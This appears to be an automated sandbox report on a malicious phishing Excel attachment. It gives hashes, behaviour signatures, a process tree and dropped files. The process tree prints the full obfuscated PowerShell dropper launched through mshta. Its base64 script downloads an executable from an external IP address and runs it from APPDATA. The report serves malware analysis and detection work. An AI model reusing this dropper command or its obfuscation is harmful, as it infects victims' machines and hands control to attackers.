Overview

overview

10

Static

static

1

inquiry MT...31.xls

windows7-x64

10

inquiry MT...31.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    07-07-2024 01:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    inquiry MTO-PILZ-TF-8531.xls

  • Size

    430KB

  • MD5

    996967065e5478555d9c4bf0838f6fd0

  • SHA1

    8c07156945c2c55d61df66ff9ee0f2d6c598a6a4

  • SHA256

    158644533c0c9683e8c8da4cfafd48eb05164ae25bb0e5f433ed23aec8a7464e

  • SHA512

    39c11818eae917356cd178476c2b55c67ca209246e11f0115999ae50e5f7fc6adc1d375ff974ef8020ccb25a1ad474a094f20625db4f741c902fdcf182e1e18e

  • SSDEEP

    12288:U6NCL1OGQpozwjTqCfgn+/doG59yeXWWeIgpWpKhNSB:U6NC5rFWWCfgnkdoG59ye5cIOS

Score
10/10
phishing

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Detected phishing page
    phishing
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 33 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\inquiry MTO-PILZ-TF-8531.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\SysWOW64\ktmutil.exe
      "C:\Windows\SysWOW64\ktmutil.exe"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of SetThreadContext
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2284
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C poWerShelL -eX BYpaSS -nOP -w 1 -c deVIceCRedentIaLdePLOYMENt.exE ; ieX($(iex('[SySTEm.tExt.encODing]'+[ChAR]0x3a+[Char]0X3A+'UtF8.GetSTRing([SYsTEM.CoNVERT]'+[chAr]58+[CHAr]58+'FROMBASe64StRiNG('+[CHar]34+'JFhrRFFCQTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYkVyZGVmSW5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXYyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVBYmJvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWRDb1hXYlUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWm9mY0ZJLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQW9KKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm9NdENoRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG5YRncgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYa0RRQkE0OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC41LjE3LzY2MDU1L2lnY2N1LmV4ZSIsIiRFTnY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U3RhcnQtU0xFZXAoMyk7c3RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcaGtjbWQuZXhlIg=='+[CHar]0X22+'))')))"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2392
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        poWerShelL -eX BYpaSS -nOP -w 1 -c deVIceCRedentIaLdePLOYMENt.exE ; ieX($(iex('[SySTEm.tExt.encODing]'+[ChAR]0x3a+[Char]0X3A+'UtF8.GetSTRing([SYsTEM.CoNVERT]'+[chAr]58+[CHAr]58+'FROMBASe64StRiNG('+[CHar]34+'JFhrRFFCQTQgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYkVyZGVmSW5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXYyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVBYmJvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWRDb1hXYlUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWm9mY0ZJLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQW9KKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm9NdENoRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG5YRncgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYa0RRQkE0OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC41LjE3LzY2MDU1L2lnY2N1LmV4ZSIsIiRFTnY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U3RhcnQtU0xFZXAoMyk7c3RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcaGtjbWQuZXhlIg=='+[CHar]0X22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vcqikgni.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1128
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6AF4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6AF3.tmp"
            5⤵
              PID:820
          • C:\Users\Admin\AppData\Roaming\hkcmd.exe
            "C:\Users\Admin\AppData\Roaming\hkcmd.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:2104
            • C:\Windows\SysWOW64\svchost.exe
              "C:\Users\Admin\AppData\Roaming\hkcmd.exe"
              5⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              PID:1596

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\66055[1].hta
      Filesize

      8KB

      MD5

      c2d38ffc92cb365472534e51ec747405

      SHA1

      7e92d52683b46eec235e66f18c1b414fc75643d6

      SHA256

      82eeb1ac4df3cab27f9ea5b2a09b7c9993090bc33e9b0b8d9ae34673a0b3cd95

      SHA512

      a5db53376ba44aa7e9b4a5f00c6061f4a6dd0ff9a73e46f6801cc9d79d98b305bc4a9ff6b7f4b622a77d9f9355705dd1c154266fd264f866c2fcdc2d101e1ba0

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\RES6AF4.tmp
      Filesize

      1KB

      MD5

      22a7da98acc402b67f5f5836f1cc08a5

      SHA1

      51cf504a969959f6ce2ae8090dabaae4572f97c2

      SHA256

      f624411e55f26055f84e8db54ac20fe0b8a666a458bfc2602a24ef139ca429eb

      SHA512

      34639d4de7299acbd44217db185c8e4dbb0e68584820519d978f8be4a83d25a6fa6948c6d428c36573f4f8adbd50c75642024980aaa78ceee1805771fbba89c8

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\pensum
      Filesize

      264KB

      MD5

      23d91bc6f8608c8d788890539b6127f3

      SHA1

      233692af0c89d215fb032d35c33190d19a581985

      SHA256

      5cde9e3dbfa9f051254881198aac9e3d103fde3e63780ed53f6a53a12c0e3e8b

      SHA512

      421d7eecce0d5b93067534ebe7c8108ffcbe5bc4bf8342d635879a4407479f10b52b4a09631ec6b970a1e5cf64f1b63c2c827ad19666c46c6ad7aac352a48c5c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\vcqikgni.dll
      Filesize

      3KB

      MD5

      4a7b916bb3433d9a3ee0b65b461cabe8

      SHA1

      abaa382b63c36c0bf70e2dcccf0bfd1c4e48db97

      SHA256

      d07fdb7cb430c358506b90d6c60927f315db5ff2974da66825842c8fc95864c7

      SHA512

      46bc2055a4ec8f2d483c148fcee31e217de32e4b0b9fc79efbc23ef96593532f4f36f4ca089833ed6ab2ed6aa3d01ca73a66de0b562e25a4faa0a18c8518c3e4

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\vcqikgni.pdb
      Filesize

      7KB

      MD5

      47acdbd0f835508f9b9da38f6593b2a9

      SHA1

      6eb8b3c00c96e47e5fef2a098ed7ef0a392eee88

      SHA256

      7ce0bde55e2e9111a3fc4a9e5e115112d3347a6a1f47b917b7b35ad6d17ea807

      SHA512

      52de362ccd4c85d0d4b795d3c9e2f167d15264e38c87aee55158b3134f5f6d51ab2e2ac30f1c5e6b2c79d466c46f1077cad9ea2a94f48d5bc82e5c4c586cd28e

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\CSC6AF3.tmp
      Filesize

      652B

      MD5

      2b03dd1dd8f23c22460891a85aa228e5

      SHA1

      6bd0a432339bbb7f3b78788b01b723144ed80c50

      SHA256

      e44e24242b9724eae0015ff1e4b185f7e932e569c3c272a9d37bb8ad07f77acd

      SHA512

      08c3a1ded9473d9503551300a331ee5deae5216c4bead6807ce205ab5a728cd430e9e266a26e27beea7fd0864464a4d2fab01146f14bef3e1d9c28ac688530af

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\vcqikgni.0.cs
      Filesize

      443B

      MD5

      62428a5441b9e6016ca35fb63a889ce1

      SHA1

      cc4bcfec8130f8539645c80410d6b72403b46bb8

      SHA256

      3624c195a637f25ff4b397f6e3e0f9395bab69e64f6c65d33f6e0f20f64d2ce9

      SHA512

      72f5b42f94057bc07f4171739300d058972a57c54fa05b7fe95015a00a17c75fff036227e6c9525ac2d757eff4f02c99a8eb62ba2a8eb27ed6059e1734971624

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\vcqikgni.cmdline
      Filesize

      309B

      MD5

      c686c365f3fd946e07d0248bc615c4c3

      SHA1

      28c807ea0861100ffc1a2e4f36e47f2fb530dc92

      SHA256

      8a966642b59a167a2baa5aa94ccbb9cf2abad295e4c5b999d5ae3c6f741b1a9a

      SHA512

      2e233f4a8211417872c6ea9e917f1c638da504968aedc48800e97ed455e63b7cc6c2736a5f5c0a08379b96843cdddcbee4dec69ea30c807b2a26277df019bbb0

      Download Submit

    • \Users\Admin\AppData\Roaming\hkcmd.exe
      Filesize

      1.1MB

      MD5

      c3ebea7cd7e96887d0fffff22bf00101

      SHA1

      1e2a2b28d96799f978d86cfb14744e92aeb18220

      SHA256

      b0e6a88e88c1285509436037b3a3f41f4736460bdd64db7086e032fa2cee4832

      SHA512

      310c12aff1dd0b13f1a9a3897969bf9b90cdb950660efc27a97093f979dc9c06563a9d596b4511225cfe924311fdbf5233b48dd2bcddfbcb44642ee9eb22ebc8

      Download Submit

    • memory/1596-49-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

      Download

    • memory/1724-50-0x00000000721BD000-0x00000000721C8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1724-1-0x00000000721BD000-0x00000000721C8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/1724-5-0x0000000002240000-0x0000000002242000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1724-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1724-53-0x0000000008A00000-0x0000000008AF9000-memory.dmp

      Filesize

      996KB

      Download

    • memory/1724-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1724-66-0x0000000008A00000-0x0000000008AF9000-memory.dmp

      Filesize

      996KB

      Download

    • memory/1724-67-0x00000000721BD000-0x00000000721C8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2284-51-0x0000000000080000-0x00000000000BF000-memory.dmp

      Filesize

      252KB

      Download

    • memory/2284-52-0x0000000000080000-0x00000000000BF000-memory.dmp

      Filesize

      252KB

      Download

    • memory/2284-58-0x0000000000080000-0x00000000000BF000-memory.dmp

      Filesize

      252KB

      Download

    • memory/2956-4-0x0000000002860000-0x0000000002862000-memory.dmp

      Filesize

      8KB

      Download